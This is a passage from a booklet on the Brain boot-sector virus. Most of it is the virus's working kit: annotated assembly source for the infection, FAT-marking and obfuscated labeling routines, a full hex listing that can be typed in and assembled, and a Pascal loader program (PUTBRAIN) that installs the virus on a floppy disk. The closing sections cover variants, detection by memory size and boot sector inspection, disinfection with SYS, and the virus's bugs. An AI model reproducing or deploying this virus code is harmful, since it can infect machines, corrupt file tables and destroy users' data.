RD_WRT_FAT PROC NEAR MOV CX,4 ;retry counter = 4DSK_LP: PUSH CX ;save it PUSH AX ;preserve ax too MOV AH,0 ;reset the disk first INT BDSK_INT POP AX JB DSK_BAD ;jump if reset fails MOV BX,OFFSET DISK_BUFFER MOV AL,4 ;read/write 4 sectors MOV DH,0 ;at cyl 0, hd 0, sec 2 MOV DL,[DRIVE_NO] MOV CX,2 PUSH AX ;save ax INT BDSK_INT ;go do it POP AX JNB RWFAT_OK ;exit if successfulDSK_BAD: POP CX ;else retry LOOP DSK_LP ;if counter not zero POP AX ;these pops look like a bug! POP AX MOV AL,2 ;set carry and al=2 STC ;as an indicator of failure RET ;and return

RWFAT_OK: POP CX ;clear stack and return RET ;with c reset on success

RD_WRT_FAT ENDP


;******************************************************************************;This routine computes cyl, hd, and sec numbers from a cluster number passed in;cx. It is used to determine where to do writes using BIOS, based on the;cluster numbers gathered from the FAT when marking out a bad area. The cyl,;hd, sec info is stored in INF_CYL, INF_HEAD and INF_SECTOR.

COMP_HD_TRK_SEC PROC NEAR PUSH CX ;cluster number in cx SUB CX,2 SHL CX,1 ; ADD CX,0CH ;cx = absolute sector number now MOV AX,CX MOV CL,12H ;cl = 18, sectors per cylinder DIV CL ;al = trk, ah= sec in cylinder MOV BYTE PTR DS:INF_CYL,AL ;cyl of 1st sector in cluster MOV BYTE PTR DS:INF_HEAD,00 ;assume head is 0 INC AH ;sector number goes 1 to 18 CMP AH,9 ;is it greater than 9? JNA CHTS_1 ;no, so head is 0, sec # is ok SUB AH,9 ;else subtract 9 sectors MOV BYTE PTR DS:INF_HEAD,01 ;and set head = 1CHTS_1: MOV BYTE PTR DS:INF_SECTOR,AH;save sector number here POP CX ;restore cluster number RET ;and exit

COMP_HD_TRK_SEC ENDP

;****************************************************************************** DB 6 DUP (0)

DISK_FCTN DB 3DIR_ENTRIES DW 5BHTEMP_W1 DW 303H TEMP_W2 DW 0EBEHTEMP_W3 DW 1TEMP_W4 DW 100H

DB 0E0H,0D8H,9DH,0D7H DB 0E0H,09FH,8DH,98H,09FH,8EH DB 0E0H DB ’ (c) ashar $’ ;can be played with DOS fctn 9!

;******************************************************************************;This procedure puts the ’(c) Brain’ label in the root directory to notify the;user that that diskette has been infected by the brain virus.

PUT_LABEL PROC NEAR CALL READ_ROOT_DIR ;read root directory from disk JB PL_ERR ;exit on error PUSH DI ;preserve di CALL WRITE_LABEL ;write the label in memory POP DI JB PL_ERR ;exit on error CALL WRITE_ROOT_DIR ;and write memory image to diskPL_ERR: RET

PUT_LABEL ENDP

DB 0BBH,9BH,4,0B9H,0BH,0 ;random unused bytes here DB 8AH,7,0F6H,0D8H,88H,4 DB 46H,43H,0E2H,0F6H,0B0H,8 DB 88H,4,0F8H,0C3H,0C6H,6

;******************************************************************************;This procedure modifies the image of the root directory in memory to put the;label ’(c) Brain’ in one directory entry. The label will be inserted in the;first open entry, or it will overwrite the existing label, if there is one.;This is an incredibly tricky procedure. It makes an attempt to fool anyone who


;tries to disassemble it, and confuse the heck out of them, using already;executed instructions for data, etc. It is fully documented in the;accompanying text.

WRITE_LABEL PROC NEAR MOV DIR_ENTRIES,6CH ;number of dir entries available MOV SI,OFFSET DISK_BUFFER+40H ;assume DOS files are there MOV TEMP_W1,DX ;save dx MOV AX,DIR_ENTRIES SHR AX,1 MOV TEMP_W3,AX ;TEMP_W3 = 36H SHR AX,1 MOV TEMP_W2,AX ;TEMP_W2 = 1BH * needlessly XCHG AX,CX AND CL,43H ;CL = 3 * confusing MOV DI,TEMP_W2 ADD DI,01E3H ;DI = 1FE Hex * code

DS_LOOP: MOV AL,BYTE PTR [SI] ;check a directory entry CMP AL,0 ;is it empty? JE USE_DIR_ENTRY ;yes, use it for label MOV AL,BYTE PTR [SI+0BH] ;else check attribute AND AL,8 ;is it a label? CMP AL,8 JE USE_DIR_ENTRY ;if a label, go change it ADD SI,20H ;else go to next dir entry DEC DIR_ENTRIES ;decrement counter JNE DS_LOOP ;and loop until all checked STC ;if no room for label set carry RET ;and return

DB 8BH ;more confusion

USE_DIR_ENTRY: MOV BX,WORD PTR [DI] ;BX=ds:[1FE]= XOR BX,TEMP_W3 ;BX=36H MOV TEMP_W3,SI ;TEMP_W3 = ptr to dir entry CLI ;turn OFF Interrupts MOV AX,SS MOV TEMP_W1,AX ;save ss here MOV TEMP_W2,SP ;and sp here MOV AX,CS MOV SS,AX ;ss=cs MOV SP,TEMP_W3 ;sp = dir entry ADD SP,0CH ;at end of name

FUN_CODE: MOV CL,51H ;here is where the fun starts ADD DX,444CH ; none of this code MOV DI,2555H ;really does anything MOV CX,0C03H ;except act as data for REPZ CMPSW ;what follows MOV AX,0B46H MOV CX,0003H ROL AX,CL ;AX=5A30H MOV TEMP_W3,AX ;put it here

MOV CX,5 ;OK, real code, loop counter = 5 MOV DX,0008H ;nonsense SUB TEMP_W3,5210H ;adjust TEMP_W3 to 0820H PUSH TEMP_W3 ;use to set attribute, last byte

;LP1 and LP2 decode the above nonsense code. BX is set to the start of the;dual purpose code (OFFSET FUN_CODE) upon entry here.LP1: MOV AH,BYTE PTR [BX] ;get a byte from the code INC BX ;move pointer up MOV DL,AH ;this one goes in ah SHL DL,1 ;is byte greater than 7FH? JB LP1 ;yes, go get another

LP2: MOV DL,BYTE PTR [BX] ;else get another byte INC BX ;move pointer up


MOV AL,DL ;this one goes in al SHL DL,1 ;is byte greater than 7FH? JB LP2 ;yes, go get another

ADD AX,1D1DH ;word in ax, add 1D1D to it PUSH AX ;and use this byte to make label INC WORD PTR TEMP_W3 ;no apparent purpose

JNB LP3 ;this always jumps

DB 0EAH ;nonsense

LP3: LOOP LP1 ;loop 5 times MOV SP,WORD PTR TEMP_W2 ;restore sp MOV AX,WORD PTR TEMP_W1 ;and ss MOV SS,AX STI ;turn ON Interrupts ADD DH,BYTE PTR [BP+SI] ;more nonsense CLC ;clear c to indicate success RET ;and exitWRITE_LABEL ENDP

;******************************************************************************;This procedure reads the entire root directory of a 360K floppy disk into;memory at the location DISK_BUFFER.

READ_ROOT_DIR PROC NEAR MOV [DISK_FCTN],2 ;set up for a read JMP SHORT ROOT_RW ;and go do it in procedure below NOPREAD_ROOT_DIR ENDP

;******************************************************************************;This procedure writes the entire root directory of a 360K floppy disk from;memory at the location DISK_BUFFER.

WRITE_ROOT_DIR PROC NEAR MOV [DISK_FCTN],3 ;set up for a write JMP SHORT ROOT_RW ;and go do it NOPWRITE_ROOT_DIR ENDP

;******************************************************************************;This procedrue performs the actual mechanics of reading/writing the root;directory on a 360K floppy disk. It is called only from READ_ROOT_DIR and;WRITE_ROOT_DIR above.

ROOT_RW PROC NEAR MOV DH,0 ;read/write cyl 0, hd 0, sec 6 MOV DL,[DRIVE_NO] MOV CX,0006H MOV AH,[DISK_FCTN] MOV AL,04 ;read/write 4 sectors MOV BX,OFFSET DISK_BUFFER ;to/from here CALL DISK_OPERATION ;go do it JB RRW_ERR ;exit on error MOV CX,1 ;next rd/wrt cyl 0, hd 1, sec 1 MOV DH,1 MOV AH,[DISK_FCTN] MOV AL,3 ;read/write 3 more sectors ADD BX,800H ;move buffer ptr up CALL DISK_OPERATIONRRW_ERR: RET

ROOT_RW ENDP


;******************************************************************************;This routine just performs a disk interrupt, with the added niceties of;doing a disk reset before performing the requested operation, and allowing;for up to 4 retries in the event that the interrupt is not successful. AX,;BX,CX,DX and ES are set up just as they would be in doing a direct Int 13H;when this routine is called.

DISK_OPERATION PROC NEAR MOV [TEMP_W1],AX ;save ax,bx,cx & dx MOV [TEMP_W2],BX MOV [TEMP_W3],CX MOV [TEMP_W4],DX MOV CX,4 ;retry counter = 4DO_LOOP: PUSH CX MOV AH,0 ;reset disk first INT BDSK_INT JB DSK_FAIL ;jump if reset failed MOV AX,[TEMP_W1] ;restore ax,bx,cx & dx MOV BX,[TEMP_W2] MOV CX,[TEMP_W3] MOV DX,[TEMP_W4] INT BDSK_INT ;and perform requested disk op JNB DSK_OK ;jump if it was successfulDSK_FAIL: POP CX ;else retry up to 4 times LOOP DO_LOOP STC ;if retry cnt expired, set c RET ;and exit

DSK_OK: POP CX ;clean stack on success RET ;and return with c clear

DISK_OPERATION ENDP

DB 0,0,0 ;Unnecessary bytes

;******************************************************************************;The following routine moves the original boot sector on the disk to the first;sector in the hidden area. Next, it moves five sectors from RAM onto the;disk, right after the boot sector. Finally, it moves the viral boot sector;from RAM into the boot sector position at Cylinder 0, Head 0, Track 1. It;assumes that the location to put the virus in has already been found and;placed in the INF_SECTOR/INF_HEAD variables. This routine returns with;c set if it fails.

TEMP1 DW 3 ;Temporary storageDISK_OP DW 301H ;Used by DISK_READ & DISK_WRITE ;to indicate rd/wrt operation

INFECT_DISK PROC NEAR CALL MODIFY_FAT ;modify FAT table to hide virus JB INF_EXIT ;exit on error MOV WORD PTR DS:CURR_SECCYL,1 MOV BYTE PTR DS:CURR_HEAD,0 ;read the real boot sector MOV BX,OFFSET DISK_BUFFER ;into this buffer CALL DISK_READ MOV BX,OFFSET DISK_BUFFER MOV AX,WORD PTR DS:INF_SECTOR MOV WORD PTR DS:CURR_SECCYL,AX MOV AH,BYTE PTR DS:INF_HEAD MOV BYTE PTR DS:CURR_HEAD,AH ;and hide it in first sector of CALL DISK_WRITE ;hidden area on disk CALL NEXT_SECTOR ;move pointers to next sector MOV CX,5 ;sectors to write counter MOV BX,200H ;set buffer pointer=this codeINF_WRITE_LP: MOV [TEMP1],CX ;save sector count here CALL DISK_WRITE ;write a sector to disk CALL NEXT_SECTOR ;move pointers to next sector ADD BX,200H ;increment buffer pointer MOV CX,[TEMP1] ;restore sector count LOOP INF_WRITE_LP ;loop until done


MOV BYTE PTR DS:CURR_HEAD,0 MOV WORD PTR DS:CURR_SECCYL,1 MOV BX,0 ;Now put virus’ boot sector CALL DISK_WRITE ;at cyl 0, hd 0, trk 1 CLC ;clear c to indicate successINF_EXIT: RET ;and exit

INFECT_DISK ENDP

;******************************************************************************;This procedure reads one sector into memory at es:bx using CURR_HEAD and;CURR_SECCYL for the cylinder/head/sector numbers. It sets c upon return if;the read operation fails.

DISK_READ PROC NEAR MOV [DISK_OP],201H ;instruction to read 1 sector JMP SHORT DO_DISK ;go execute operation NOP

DISK_READ ENDP

;******************************************************************************;This procedure writes one sector from memory at es:bx using CURR_HEAD and;CURR_SECCYL for the cylinder/head/sector numbers. It sets c upon return if;the write operation fails.DISK_WRITE PROC NEAR MOV [DISK_OP],301H ; ;instruction to write 1 sector JMP SHORT DO_DISK ;go execute operation NOP

DISK_WRITE ENDP

;******************************************************************************;This works in conjunction with DISK_READ and DISK_WRITE above. It simply;performs the requested disk operation, and attempts to complete it up to;four times before giving up. If successful, it returns nc, else it returns;with c set.

DO_DISK PROC NEAR PUSH BX ;save buffer address MOV CX,4 ;retry countDD_LOOP: PUSH CX MOV DH,BYTE PTR DS:CURR_HEAD MOV DL,BYTE PTR DS:DRIVE_NO ;load current disk parameters MOV CX,WORD PTR DS:CURR_SECCYL MOV AX,[DISK_OP] ;and the operation to perform INT BDSK_INT ;and execute JNB DD_OK ;jump if successful MOV AH,0 ;else attempt disk reset INT BDSK_INT POP CX ;and go through loop again LOOP DD_LOOP POP BX ;if loop expired, clean up POP BX ;second pop here looks like bug STC ;set carry flag RET ;and get out

DD_OK: POP CX ;disk operation successful POP BX ;so clean up RET ;and return with c clear

DO_DISK ENDP

;******************************************************************************;This procedure increments the memory variables CURR_SECCYL and CURR_HEAD;to point to the next sector on a 360K disk. Upon entry, they contain a valid;cylinder, head and sector number.


NEXT_SECTOR PROC NEAR INC BYTE PTR DS:CURR_SECCYL ;increment sector counter CMP BYTE PTR DS:CURR_SECCYL,0AH ;is it 10 yet? JNE NS_DONE ;no, all done MOV BYTE PTR DS:CURR_SECCYL,1 ;yes, set it to 1 INC BYTE PTR DS:CURR_HEAD ;and increment head counter CMP BYTE PTR DS:CURR_HEAD,2 ;is head 2 yet? JNE NS_DONE ;no, all done MOV BYTE PTR DS:CURR_HEAD,0 ;yes, set it to 0 INC BYTE PTR DS:CURR_SECCYL+1 ;And increment cylinder ctrNS_DONE: RET

NEXT_SECTOR ENDP;******************************************************************************

DB 64H,74H,61H

;******************************************************************************

DISK_BUFFER DW 1CEBH ;buffer for reading disk DW 4990H

RBRAIN_ID DW 4D42H ;RAM BRAIN boot sector IDRSTART_HEAD DB 20H ;RAM based drive headRSTART_SECCYL DW 3420H ;sector and cylinder

DB 2EH,30H,0,2,2

;******************************************************************************;This is the start of the BRAIN boot sector. ORG 7C00H

MEM_SIZE EQU 413H

BRAIN PROC NEAR CLI ;Turn OFF Interrupts JMP NEAR PTR START

;******************************************************************************

BRAIN_ID DW 1234HSTART_HEAD DB 0START_SECCYL DB 7,0DHHEAD_NO DB 0SECTOR_NO DB 1CYL_NO DB 0 DB 0,0,0,0

DB ’Welcome to the Dungeon (c) 1986 Brain’ DB 17H DB ’& Amjads (pvt) Ltd VIRUS_SHOE RECORD ’ DB ’v9.0 Dedicated to the dynamic memories of millions ’ DB ’of virus who are no longer with us today - Thanks ’ DB ’GOODNESS!! BEWARE OF THE er..VIRUS : ’ DB ’\this program is catching program ’ DB ’follows after these messeges..... $#@%$@!! ’

;******************************************************************************START: MOV AX,CS MOV DS,AX MOV SS,AX ;ss=ds=cs=0 MOV SP,0F000H ;set up stack STI ;Turn ON Interrupts MOV AL,[START_HEAD] ;starting head number for read MOV [HEAD_NO],AL MOV CX,WORD PTR [START_SECCYL] MOV WORD PTR [SECTOR_NO],CX CALL NXT_SECTOR ;set params for next disk sector


MOV CX,5 ;Virus has 5 more sectors MOV BX,7E00H ;Load remainder of virus hereLOAD_VIRUS: CALL READ_DISK ;Read a sector from disk CALL NXT_SECTOR ;set params for next disk sector ADD BX,200H ;move buffer for next sector LOOP LOAD_VIRUS ;Dec CX;Loop if CX>0 MOV AX,WORD PTR DS:[MEM_SIZE] ;Size of memory in kilobytes SUB AX,7 ;Decrement it by 7 MOV WORD PTR DS:[MEM_SIZE],AX MOV CL,6 SHL AX,CL ;Convert resultant into seg @ MOV ES,AX ;And set es up with that segment MOV SI,7C00H ;Move this sector and the rest MOV DI,0 ;Up to high memory MOV CX,1004H CLD ;Forward String Opers REP MOVSB ;Mov DS:[SI]->ES:[DI] PUSH ES ;Prepare for control transfer MOV AX,200H ;to offset 200 (first of the PUSH AX ;hidden sectors) RETF ;Go to high memoryBRAIN ENDP

;Read a sector from disk. This preserves bx and cxREAD_DISK PROC NEAR PUSH CX PUSH BX MOV CX,4 ;Retry countREAD_LOOP: PUSH CX MOV DH,[HEAD_NO] MOV DL,0 MOV CX,WORD PTR [SECTOR_NO] MOV AX,201H INT 13H ;read sector, into ES:BX JNB READ_IS_OK ;No error, so continue MOV AH,0 ;Attempt to reset if an error INT 13H ;DSK:00-reset, DL=drive POP CX LOOP READ_LOOP ;Dec CX;Loop if CX>0 INT 18H ;Go to ROM if retries expiredREAD_IS_OK: POP CX POP BX POP CX RETREAD_DISK ENDP

;Set params for next disk sector readNXT_SECTOR PROC NEAR MOV AL,[SECTOR_NO] ;increment sector number INC AL MOV [SECTOR_NO],AL CMP AL,0AH ;is sector=10? JNE NSDONE ;if not, all done MOV [SECTOR_NO],1 ;yes, set sector=1 now MOV AL,[HEAD_NO] ;increment head count INC AL MOV [HEAD_NO],AL CMP AL,2 ;is it 2 yet? JNE NSDONE ;if not, all done MOV [HEAD_NO],0 ;yes, set head = 0 INC [CYL_NO] ;and increment cylinder numberNSDONE: RETNXT_SECTOR ENDP

;****************************************************************************** DB 0,0,0,0,32H,0E3H DB 23H,4DH,59H,0F4H,0A1H,82H DB 0BCH,0C3H,12H,0,7EH,12H DB 0CDH,21H,0A2H,3CH,5FH,0CH,5

VIRUSEG ENDS END COM_START


8. The Hex Listing

The following is an assembled HEX listing of the virus. It can betyped in, and loaded using a HEX loader such as the one in Appendix A inthis note. This results in a binary COM file which can then be placed ona floppy disk using the Virus Loader PUTBRAIN described in Section 9.

:10000000E9FD7A0000000000000000000000000090:10010000EB262863292031393836204A6F726B205C:10011000202620416D6A616473202870767429203E:100120004C746420000400002EC60625021F33C054:100130008ED8A14C00A3B401A14E00A3B601B8769D:1001400002A34C008CC8A34E00B9040033C08EC07B:10015000512E8A360600B2002E8B0E0700B801021F:10016000BB007CCD6D7309B400CD6D59E2E2CD18B2:10017000EA007C000090FB80FC02751880FA027790:100180001380FD00750580FE00740C2EFE0E250206:100190007502EB03E9A5002EC6062702002EC6064F:1001A000250204505351522E88162602B9040051DC:1001B000B400CD6D7215B600B90100BBBE06068C49:1001C000C88EC0B80102CD6D07730659E2E1EB2F6E:1001D00090592EA1C2063D341275082EC60627027C:1001E00001EB201E068CC88ED88EC056E81503720F:1001F000092EC606270202E8B8015E071F7304B481:1002000000CD6D5A595B5883F901753080FE007539:100210002B2E803E27020175112E8B0EC5062E8BCC:1002200016C3062E8A162602EB122E803E270202E5:10023000750A2E8B0E07002E8A360600CD6DCA0277:10025000EB259003002028632920313938362042CD:100260007261696E202620416D6A61647320287076:10027000767429204C7464E8AD00A1BE063DFDFFF4:100280007404B003F9C3B93700C70653030000E88C:1002900066003D0000750EFF065303833E530303C3:1002A0007509EB1290C706530300004181F9630101:1002B00075DDB001F9C3B203E8100049FECA75F854:1002C00041E89A00E86600B000F8C35152BEBE068D:1002D0008AC1D0E8720EE842008B002500F00DF7CD:1002E0000FEB0C90E834008B00250F000D70FF8998:1002F00000898000045A59C351BEBE068AC1D0E8A5:10030000720BE816008B0025FF0FEB0D90E80B0039:100310008B0025F0FFB104D3E859C352B80300F7AE:10032000E1D1E88BD85AC3B402E80700C3B403E8AC:100330000100C3B904005150B400CD6D587214BB14:10034000BE06B004B6008A162602B9020050CD6D72:1003500058730959E2E05858B002F9C359C35183A0:10036000E902D1E183C10C8BC1B112F6F1A2080000:10037000C606060000FEC480FC09760880EC09C6AB:10038000060600018826070059C30000000000008F


:10039000035B000303BE0E01000001E0D89DD7E01F:1003A0009F8D989F8EE02028632920617368617279:1003B0002024E8DB00720A57E81F005F7203E8D7C9:1003C00000C3BB9B04B90B008A07F6D888044643D8:1003D000E2F6B0088804F8C3C606C70691046C00AC:1003E000BEFE0689169304A19104D1E8A39704D117:1003F000E8A395049180E1438B3E950481C7E30116:100400008A043C0074158A440B24083C08740C834D:10041000C620FF0E910475E8F9C38B8B1D331E9720:100420000489369704FA8CD0A39304892695048C0A:10043000C88ED08B26970483C40CB15181C24C4422:10044000BF5525B9030CF3A7B8460BB90300D3C0B9:10045000A39704B90500BA0800812E97041052FF33:100460003697048A27438AD4D0E272F78A17438AE0:10047000C2D0E272F7051D1D50FF0697047301EA12:10048000E2E18B269504A193048ED0FB0232F8C3DF:10049000C606900402EB0990C606900403EB019097:1004A000B6008A162602B906008A269004B004BB5C:1004B000BE06E815007212B90100B6018A26900442:1004C000B00381C30008E80100C3A39304891E950B:1004D00004890E970489169904B9040051B400CD1B:1004E0006D7213A193048B1E95048B0E97048B16CB:1004F0009904CD6D730559E2E3F9C359C3000000B7:1005000003000103E849FD7254C7060A000100C652:1005100006090000BBBE06E84400BBBE06A10700FA:10052000A30A008A26060088260900E83900E86543:1005300000B90500BB0002890E0006E82900E85555:100540000081C300028B0E0006E2ECC60609000023:10055000C7060A000100BB0000E80B00F8C3C7068D:1005600002060102EB0A90C70602060103EB0190A6:1005700053B90400518A3609008A1626028B0E0AE6:1005800000A10206CD6D730BB400CD6D59E2E55BA1:100590005BF9C3595BC3FE060A00803E0A000A7578:1005A00019C6060A0001FE060900803E0900027510:1005B00009C606090000FE060B00C3647461EB1C4B:1005C0009049424D2020342E3000020200000000ED:107B0000FAE94A01341200070D00010000000000EC:107B100057656C636F6D6520746F207468652020F5:107B200044756E67656F6E20202020202020202065:107B3000286329203139383620427261696E172650:107B400020416D6A616473202870767429204C741A:107B50006420202056495255535F53484F452020FA:107B60005245434F524420202076392E3020202089:107B700044656469636174656420746F207468652A:107B80002064796E616D6963206D656D6F726965E2:107B900073206F66206D696C6C696F6E73206F6601:107BA0002076697275732077686F20617265206E28:107BB0006F206C6F6E6765722077697468207573CB:107BC00020746F646179202D205468616E6B73207E:107BD000474F4F444E455353212120202020202041:107BE00020424557415245204F4620544845206584


:107BF000722E2E564952555320203A205C746869E3:107C0000732070726F6772616D2069732063617495:107C10006368696E6720202020202070726F677271:107C2000616D20666F6C6C6F77732061667465722E:107C3000207468657365206D657373656765732E61:107C40002E2E2E2E202423402524402121208CC896:107C50008ED88ED0BC00F0FBA0067CA2097C8B0ED7:107C6000077C890E0A7CE85700B90500BB007EE856:107C70002A00E84B0081C30002E2F4A113042D079F:107C800000A31304B106D3E08EC0BE007CBF000089:107C9000B90410FCF3A406B8000250CB5153B90448:107CA00000518A36097CB2008B0E0A7CB80102CDE5:107CB000137309B400CD1359E2E7CD18595B59C3CA:107CC000A00A7CFEC0A20A7C3C0A751AC6060A7C81:107CD00001A0097CFEC0A2097C3C027509C6060908:107CE0007C00FE060B7CC30000000032E3234D59EC:107CF000F4A182BCC312007E12CD21A23C5F0C0510:00000001FF

9. The Virus Loader

The following program, PUTBRAIN, is a Turbo Pascal program toput the Brain virus on a 360K floppy disk. To use it, simply place it in thesame directory as BRAIN.COM, as assembled from Section 7, or loadedfrom Section 8, and execute PUTBRAIN. PUTBRAIN essentially mim-ics the virus’ infection routine. It locates an open space on the disk andputs the main body of the virus there, along with the original boot sectoron the disk. It overwrites the boot sector with the viral boot sector, andfinally marks the clusters where the Brain resides as bad in the FAT table.

program put_brain_to_a;

uses dos;

var diskbuf :array[0..32767] of byte; cyl,hd,sec :byte; sc,sh,ss :byte; start_cluster :word; brain :file;

procedure increment(var c,h,s:byte);begin s:=s+1; if s>9 then begin s:=1; h:=h+1; if h>1 then begin h:=0; c:=c+1;


end; end;end;

procedure read_sectors(c,h,s,n:byte);var o :word; r :registers;begin o:=0; repeat repeat r.ah:=2; r.al:=1; r.bx:=ofs(diskbuf[o]); r.es:=seg(diskbuf); r.dh:=h; r.dl:=0; r.ch:=c; r.cl:=s; intr($13,r); until r.flags and 1 = 0; n:=n-1; o:=o+512; increment(c,h,s); until n=0;end;

procedure write_sectors(c,h,s,n:byte);var o :word; r :registers;begin o:=0; repeat repeat r.ah:=3; r.al:=1; r.bx:=ofs(diskbuf[o]); r.es:=seg(diskbuf); r.dh:=h; r.dl:=0; r.ch:=c; r.cl:=s; intr($13,r); until r.flags and 1 = 0; n:=n-1; o:=o+512; increment(c,h,s); until n=0;end;

procedure init_disk;var r :registers;begin r.ah:=0; r.dl:=0; intr($13,r);end;

function cluster_entry(cl:word):word;var a :word;begin if odd(cl) then begin cl:=(cl*3) div 2; cl:=diskbuf[cl]+256*diskbuf[cl+1]; cl:=(cl and $FFF0) shr 4; end else


begin cl:=(cl*3) div 2; cl:=diskbuf[cl]+256*diskbuf[cl+1]; cl:=cl and $0FFF; end; cluster_entry:=cl;end;

procedure mark_cluster(cl,val:word);begin if odd(cl) then begin cl:=(cl*3) div 2; diskbuf[cl]:=(diskbuf[cl] and $0F)+$70; diskbuf[cl+1]:=$FF; diskbuf[cl+$400]:=diskbuf[cl]; diskbuf[cl+$401]:=diskbuf[cl+1]; end else begin cl:=(cl*3) div 2; diskbuf[cl]:=$F7; diskbuf[cl+1]:=(diskbuf[cl+1] and $F0)+$0F; diskbuf[cl+$400]:=diskbuf[cl]; diskbuf[cl+$401]:=diskbuf[cl+1]; end;end;

function find_fat_space:word;var clust_count :word; sc :word;begin sc:=$37; clust_count:=0; repeat if cluster_entry(sc)=0 then begin sc:=sc+1; clust_count:=clust_count+1; end else begin sc:=sc+1; clust_count:=0; end; until clust_count=3; sc:=sc-3; find_fat_space:=sc;end;

procedure mark_fat_bad(clust:word);var j :word;begin for j:=0 to 2 do mark_cluster(start_cluster+j,$FF7);end;

procedure setup_virus_location; {set up cyl,hd,sec from start_cluster}begin start_cluster:=((start_cluster-3)*2)+12; {Get absolute sector number} cyl:=start_cluster div 18; {Compute cylinder} sec:=(start_cluster-18*cyl)+1; hd:=0; if sec>9 then begin hd:=1; sec:=sec-9; end; writeln(cyl,’ ’,hd,’ ’,sec);end;


begin init_disk; read_sectors(0,0,2,4); {Read FAT tables in} start_cluster:=find_fat_space; mark_fat_bad(start_cluster); write_sectors(0,0,2,4); {Write FAT tables back out} setup_virus_location; {Calculate cyl,hd,sec} sc:=cyl; sh:=hd; ss:=sec; read_sectors(0,0,1,1); {Read the real boot sector} write_sectors(cyl,hd,sec,1); {And put it here} increment(cyl,hd,sec); {Go to next sector} assign(brain,’BRAINEXT.COM’); reset(brain,32000); blockread(brain,diskbuf,1); close(brain); move(diskbuf[$100],diskbuf[0],2048); write_sectors(cyl,hd,sec,3); move(diskbuf[$7B00],diskbuf[0],512); diskbuf[6]:=sh; diskbuf[7]:=ss; diskbuf[8]:=sc; write_sectors(0,0,1,1);end.

10. Notes on Variations

There are a number of varieties of the Brain floating around. As withany virus, it is difficult to track those varieties down, since they don’tnormally come with press releases announcing a new version, and becausethe anti-virus researchers name the same varieties different things, anddifferent varieties the same thing.

The original Brain was somewhat unique, as it supposedly containedthe name and address of the authors:

Brain Computer Services 730 Nizam Block Allama Iqbal Town Lahore Pakistan

hence the name, Pakistani Brain. I have, however, written to this addressand obtained no response.

As far as I can tell, there are two versions of Brain that will infecthard drives. One is also known as the Houston virus, and one is a variantof the Ashar. There are also supposedly versions that do not put the “(c)Brain” label on the disk. There is also a nasty hacked version called Clonewhich will destroy your FAT after May 5, 1992. There is also a so-calledNipper virus which is a minor modification of the Brain.

There are a number of variants of the Ashar modification of the Brainwhich is detailed in this booklet. There is a species labelled version 9.0which will infect hard drives, in addition to the version 9.0 discussed inthis booklet, which does not. There is also evidently a version 9.1 which


also does not infect hard drives. Of course nobody knows where versions1 to 8 are.

A lot of these reports are just hearsay. Since there is no library ofviruses with free, public access, and since there is no library which actuallysolicits new versions from virus writers, nobody really knows how manydifferent viruses there are out there, much less how to name them. I’veseen claims of anywhere from one to eight thousand known viruses as ofthis writing. But the real number could be more like 25,000, judging fromthe fact that most of the viruses I’ve found in the wild haven’t beenproperly cataloged by anybody.

11. Detection and Disinfection

The Brain is fairly easy to detect and get rid of, even though it is aso-called stealth virus. If your system is infected, the virus will be stealingmemory away from DOS, and you can see it using CHKDSK.

When your system boots up, it counts through available memory.Find out how much base memory it has. This will usually be 640K, but itcould be less, like 512K. (We’re not talking about extended memory here!)Now take that number and multiply by 1024 to get the total bytes of freememory available. For example, 640 x 1024 = 655,360 bytes. If you areinfected by the Brain, or any boot sector virus which uses a similartechnique to go memory resident, and you run CHKDSK (do not use /F!),it will report a total bytes memory somewhat less than this. This particularversion of Brain takes up 7K, so on a 640K machine, one will find 648,192total bytes instead of of 655,360. This is a clue that the virus is resident inmemory.

The obvious way to find the virus on a disk is to look at the labels onyour disks. Do a directory, and if the label reads “(c) Brain”, then that diskis infected. Be careful, though, the PUTBRAIN program creates aninfected disk with no label, and if you format a disk with Brain resident,you can also get a disk with no label, because FORMAT writes the rootdirectory after Brain has infected the disk (when the boot sector is written).

The fool-proof way to detect an infection is to boot from a knownclean disk and examine the boot sector of questionable disks with a utilitysuch as PC Tools, Xtree, or Norton. Then you will see the Brain’sinfamous “Welcome to the dungeon”, copyright and warnings in the bootsector. Of course, this procedure could easily be automated to developyour own scanner for the Brain.

To disinfect a disk infected with the Brain, you must first boot froma clean disk. Suppose the clean disk is in drive A, and the infected one isin drive B. Use the DOS command “SYS B:” to disinfect the disk in drive


B. Even if the SYS command fails to load the operating system onto thedisk, it will wipe the Brain out, because the first thing SYS does isoverwrite the boot sector. As long as the virus is not resident in memory,SYS will overwrite the viral boot sector with a standard DOS boot sector.Although it will leave the “(c) Brain” label on the disk, and it won’t recoverthe sectors which were marked bad by Brain, it will have short-circuitedBrain’s access to the CPU at boot time, and effectively killed the virus.

To disinfect Brain-infected disks when Brain is resident, see Section12 for a way to use a bug in Brain to do this. However, this method is notrecommended unless you simply have no choice (e.g. all of the disks youhave access to are infected.)

The easiest way to completely get rid of the Brain is to copy anyneeded files off the disk in question, and then reformat it. Remember toboot from a clean disk before you do any formatting, and don’t use theDOS 5.0 FORMAT program unless you know how to use it, because itdoesn’t always really format a disk.

Obviously, one could write a more sophisticated clean-up programwhich would read the viral boot sector, calculate where the original bootsector is, move it back where it belongs, remove the disk label, and cleanup the FAT to free up the sectors which Brain marked bad. Chances are,this is more trouble than it is worth though.

12. Bugs

I know of two bugs in the Brain. One is that it does not handle multiplesector reads correctly. If one attempts to read two sectors starting with theboot sector, one would expect to get the original boot sector and the firstsector of the first FAT. Instead, one will get the original boot sector andthe first sector of the main body of the virus. If the original boot sector isthe last sector on a cylinder, one will get a disk read error. The bug resultsbecause the Brain just moves the start Cylinder/Sector/Head for the read.A multiple sector read requires something more complex, as in the Stealthvirus in The Little Black Book of Computer Viruses.

The second bug is that the Brain does not handle reads and writessymmetrically. It redirects reads, but not writes. This bug can be used tokill the Brain in a system in which it is active in memory. Simply read theboot sector and then write it back out again. The read will be redirectedto get the original boot sector, and the write will not be redirected, so theviral boot sector will be overwritten with the original, effectively killingthe Brain on that disk. (You must remove the disk right away, though, orit will be re-infected!)


Alternatively, both bugs, working together, can cause some realdamage. Read two sectors starting with the boot sector, as describedabove. Then write them back out. You just wrote a portion of virus codeinto your FAT, destroying it. Not too pretty. This phenomenon will causeDISKCOPY to trash the copied disk, too, when Brain is resident.)

As a final note, in using interrupt 6DH for the redirected BIOS diskhandler, the Brain occasionally proves incompatible with some types ofBIOS. Changing that interrupt vector (BDSK_INT) in the source code willovercome that difficulty. Changing it to 6BH worked fine in the cases Iuncovered. That may or may not work for you, though, if you experiencethis problem.

13. References

